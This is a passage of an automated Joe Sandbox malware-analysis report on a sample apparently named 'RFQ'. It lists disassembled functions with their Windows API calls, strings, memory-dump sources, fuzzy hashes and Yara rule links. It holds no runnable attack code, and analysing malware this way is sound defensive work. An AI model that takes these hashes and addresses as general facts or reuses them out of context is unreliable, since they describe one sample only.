                                                                          Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CoInitialize.OLE32 ref: 0046C63A
                                                                          • CoUninitialize.OLE32 ref: 0046C645
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                          • API String ID: 2294789929-1287834457
                                                                          • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                          • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                          Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                          • ReleaseCapture.USER32 ref: 0047116F
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                          • API String ID: 2483343779-2107944366
                                                                          • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                          • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                          Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                          • _wcslen.LIBCMT ref: 00450720
                                                                          • _wcscat.LIBCMT ref: 00450733
                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window_wcscat_wcslen
                                                                          • String ID: -----$SysListView32
                                                                          • API String ID: 4008455318-3975388722
                                                                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                                          Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                                          • GetParent.USER32 ref: 00469C98
                                                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                                          • GetParent.USER32 ref: 00469CBC
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 2360848162-1403004172
                                                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                                          Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                                          • String ID:
                                                                          • API String ID: 262282135-0
                                                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                                          Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow
                                                                          • String ID:
                                                                          • API String ID: 312131281-0
                                                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                                          Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                          • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                                                                          • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                          • String ID:
                                                                          • API String ID: 3771399671-0
                                                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                          Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                          Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 0-1603158881
                                                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                          Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateMenu.USER32 ref: 00448603
                                                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                          • IsMenu.USER32(?), ref: 004486AB
                                                                          • CreatePopupMenu.USER32 ref: 004486B5
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                          • DrawMenuBar.USER32 ref: 004486F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                          • String ID: 0
                                                                          • API String ID: 161812096-4108050209
                                                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                          Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                          • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                          Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                          • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                          • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                          • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                          Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 978794511-0
                                                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                          Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
